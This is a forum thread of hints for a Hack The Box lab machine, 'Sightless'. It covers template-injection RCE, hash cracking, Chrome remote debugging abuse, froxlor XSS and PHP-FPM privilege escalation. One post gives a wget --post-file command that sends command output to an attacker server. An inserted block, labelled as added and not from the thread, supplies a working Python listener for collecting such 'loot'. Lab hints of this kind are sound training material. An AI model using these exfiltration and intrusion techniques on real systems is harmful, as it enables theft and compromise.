Sightless Discussion [HINTS] [HTB]

Let’s talk about Sightless. Please do not share any flags or writeups.

1. Initial Foothold

Examine the vulnerability at this link: Huntr Bounty 46630727

2. Docker Escape

Crack specific hashes to escape the Docker container.

3. Enumeration

Inspect local processes and listening ports and notice Chrome Remote Debugging. By exploiting it, get admin credentials for the froxlor service.

4. Getting Root

Once you have logged into the froxlor dashboard, you can execute commands as root by playing with PHP-FPM settings.


These are general hints for the challenge. To not spoil the fun, I did not include exact commands or steps to solve the challenge. If you need more specific hints, feel free to ask.

1 Like
  • sqlpad template injection to rce to get access on docker
  • Crack hash for user found in shadow file
  • admin.sightless.htb running on 8080
  • Portforward to access the vhost
  • Intended (xss to get credentials)
  • (Unintended) use metasploit chrome debugger to read /home/John/automation/administration.py for credentials
  • (Again unintended) Portforward all the larger ports, chrome debugging and check the network, if session is preserved you’ll get the credentials
  • For root; reset ftp creds, login and find database.kbd, crack the password and find ssh keys
  • Or you can use php-fpm to read root.txt or to get shell

This is more than enough. :slight_smile:

@Hex feel free to remove if violates any rules

3 Likes

I’ve got the KeePass, and managed to open it. The entry in the backup isn’t working though… It isn’t a key, but it doesn’t work as a password.

Edit: nvm. I got it.

1 Like

This they call an easy machine…:sweat_smile:

1 Like

Would you rate it as an easy machine for someone who has just basic knowledge of scanning using gobuster, ffuf and nmap? :thinking:

It is not Easy for a brand-new beginner.

3 Likes

And now the key doesn’t want to work… far out

I’m trying RCE in the database form but it was not successful; I got ECONNREFUSED. Any hint?

I had a lot of trouble getting a shell from the form alone. Spin up a webserver that can accept POST requests; then you can
<CMD> > /path/to/file && wget --post-file=/path/to/file http://<YOUR SERVER>

That will eventually give you enough info to get user.
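The receiving side of that wget trick, as an added example that is not from this thread: a small Python HTTP listener that accepts POST bodies, keeps them in memory and optionally appends them to a dump file, plus a urllib client (post_bytes) that stands in for `wget --post-file` so the whole thing can be exercised locally. The dump file name, port and the example output string are assumptions.

```python
"""Minimal HTTP receiver for command output POSTed from a target.

Added example, not from the thread or the box. It is the listener
behind `wget --post-file=/path/to/file http://<YOUR SERVER>`: every
POST body is appended to RECEIVED and, if a dump file is given, to
disk, so output from several commands is not lost between requests.
post_bytes() is the client side, used here in place of wget.
"""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, urlopen

RECEIVED = []  # raw POST bodies, in arrival order


class PostCatcher(BaseHTTPRequestHandler):
    dump_file = None  # set by start_server(); assumed path, e.g. "loot.txt"

    def do_POST(self):
        # wget sends Content-Length; without it we read nothing rather than block
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        RECEIVED.append(body)
        if self.dump_file:
            with open(self.dump_file, "ab") as fh:
                fh.write(body)
        # answer 200 so wget on the target exits cleanly instead of retrying
        self.send_response(200)
        self.end_headers()

    def do_GET(self):
        # a GET is a cheap connectivity check from the target
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok\n")

    def log_message(self, fmt, *args):
        # keep the console free for the loot itself
        pass


def start_server(host="0.0.0.0", port=8000, dump_file=None):
    """Start the receiver in a background thread; returns (server, bound port)."""
    PostCatcher.dump_file = dump_file
    srv = HTTPServer((host, port), PostCatcher)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def post_bytes(url, data):
    """Client side: POST raw bytes, like wget --post-file. Returns HTTP status."""
    req = Request(url, data=data, method="POST")
    with urlopen(req, timeout=5) as resp:
        return resp.status


if __name__ == "__main__":
    srv, port = start_server(dump_file="loot.txt")
    print(f"listening on {port}; POST command output here, Ctrl-C to stop")
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        srv.shutdown()
```

Run it on your attacking host, then on the target send `id > /tmp/o && wget --post-file=/tmp/o http://<YOUR SERVER>:8000/`; each body lands in RECEIVED (and loot.txt) even when you never get an interactive shell.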

How do you guys discover the port for initial access? The basic MySQL port gets refused.

1 Like

you mean to get reverse shell?

Yes, I’ve changed the command in the database form field to a reverse shell with /bin/bash but always get connection refused in the new connection tab.

You are just providing detailed hints, so it’s not a problem unless you are sharing flags.

I am not sure if XSS for credentials is an intended path, because they literally created Chrome remote debuggers, which is not the default. You might be getting credentials via XSS because people who obtain credentials via Chrome debuggers trigger the XSS, leading to valid cookies.

Someone who has a private instance could verify this.

2 Likes

Actually you can use this: Blind XSS Leading to Froxlor Application Compromise · Advisory · froxlor/Froxlor · GitHub

With XSS you can’t get the creds, but you can create a new user.

It might be. Maybe these Chrome instances are for simulating XSS. Connecting to a remote Chrome instance was a unique experience though.

1 Like

New user registration is possible, I’ve tested it.

Hey, how did you all get the admin page in Sightless? I tried gobuster, subdomains, vhost, ffuf but couldn’t get any hits…

I have the same question

1 Like

If you are confused about the server and port, just start a listener or server locally and provide that address.

1 Like